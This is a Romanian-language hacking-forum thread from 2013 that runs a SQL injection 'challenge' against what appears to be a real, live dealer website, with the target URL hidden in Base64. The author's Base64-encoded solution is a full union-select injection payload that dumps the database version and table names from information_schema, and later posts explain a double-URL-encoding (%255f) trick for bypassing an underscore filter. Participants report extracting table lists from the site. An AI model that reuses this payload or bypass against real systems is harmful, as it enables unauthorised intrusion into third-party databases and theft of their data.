Renegade Posted August 7, 2013 Report Posted August 7, 2013 (edited) TargetaHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82Nzg=Base64Tasks:display version with your namedisplay table names from primary databaseremove commas after table name (as in picture)Proof: Rules:use union select based SQLipost picture as proofsend me your command to PMSolvers:- Hannibal.- Todo- ajkaro- danyweb09Rezolvare:aceasta este syntaxa meaaHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82NzgnIGFuZCBmYWxzZSBVTklPTiBTRUxFQ1QgMSwyLDMsNCwweDUyNjU2ZTY1Njc2MTY0NjUsdmVyc2lvbigpLDcsOCxjb25jYXQocmVwbGFjZShncm91cCUyNTVmY29uY2F0KHRhYmxlJTI1NWZuYW1lLDB4M2M2MjcyM2UpLCcsJywnJykpLDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzIGZyb20gaW5mb3JtYXRpb24lMjU1ZnNjaGVtYS50YWJsZXMgd2hlcmUgdGFibGUlMjU1ZnNjaGVtYT1kYXRhYmFzZSgpLS0gLQ==Base64pentru injectie am folosit 'pentru comentara ei am folosit -- -pentru bypass la _ am folosit %255f,adica: _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencodepentru inlocuirea virgulei de dupa tabele eu am folosit "replace"challenge closed Edited September 25, 2013 by Renegade Quote
Hannibal. Posted August 7, 2013 Report Posted August 7, 2013 Cam asa ceva?Scuza-ma ca am postat asa tarziu, acum m-am trezit:">Multumesc pentru challenge. Quote
ajkaro Posted August 8, 2013 Report Posted August 8, 2013 (edited) Nice challenge...:-) Edited August 8, 2013 by ajkaro Quote
Active Members dancezar Posted August 8, 2013 Active Members Report Posted August 8, 2013 (edited) Multumesc mult pentru challenge.Initial am crezut ca e foarte usor dar nu prea a fost:))Chiar am invatat ceva:)Imediat vin cu un edit sa las un screenshot//Gatahttp://s23.postimg.org/cue9sdxt7/rsz_screenshot_3.png Edited August 8, 2013 by danyweb09 Quote
XoddX Posted August 8, 2013 Report Posted August 8, 2013 Am ajuns pana la tabele...ma poate ajuta cineva cu ele? Am incercat diferite "chestii" dar nu am reusit. Vreau sa ma ajutati pentru incultura mea generala nu pentru CH.Astept un PM va rog. Multumesc. Quote
Renegade Posted August 8, 2013 Author Report Posted August 8, 2013 Am ajuns pana la tabele...ma poate ajuta cineva cu ele? Am incercat diferite "chestii" dar nu am reusit. Vreau sa ma ajutati pentru incultura mea generala nu pentru CH.Astept un PM va rog. Multumesc.voi posta rezolvarea la final.mai incearca,nu te da batut.baftautilizeaza cu incredere cursurile academieihttp://pentesting-academy.com/MySQLiacademy/lv1.php?id=1 Quote
XoddX Posted August 10, 2013 Report Posted August 10, 2013 Se poate rezolvarea? Am reusit sa extrag toate alea dar nu pot sa scot acele virguli. So? Quote
Hannibal. Posted August 10, 2013 Report Posted August 10, 2013 *** hint ***ai cautat cumva pe net un tabel cu valoarea hex pentru newline? Quote
Renegade Posted August 10, 2013 Author Report Posted August 10, 2013 o sa postez diseara rezolvarea.pana atunci un hint.inlocuiti _ cu %255f.de unde %255f ???luati _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencodeinsa pe langa asta mai trebuie sa eliminati , la afisare tabelelor pentru a fi trecuti la solvers.succes Quote
XoddX Posted August 10, 2013 Report Posted August 10, 2013 Asta am facut insa mai trb sa elimin " , " si CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS Quote
Renegade Posted August 10, 2013 Author Report Posted August 10, 2013 nu e bine.pana in ora 8 incerc sa pun rezolvarea explicata.sunt pe tel acum Quote
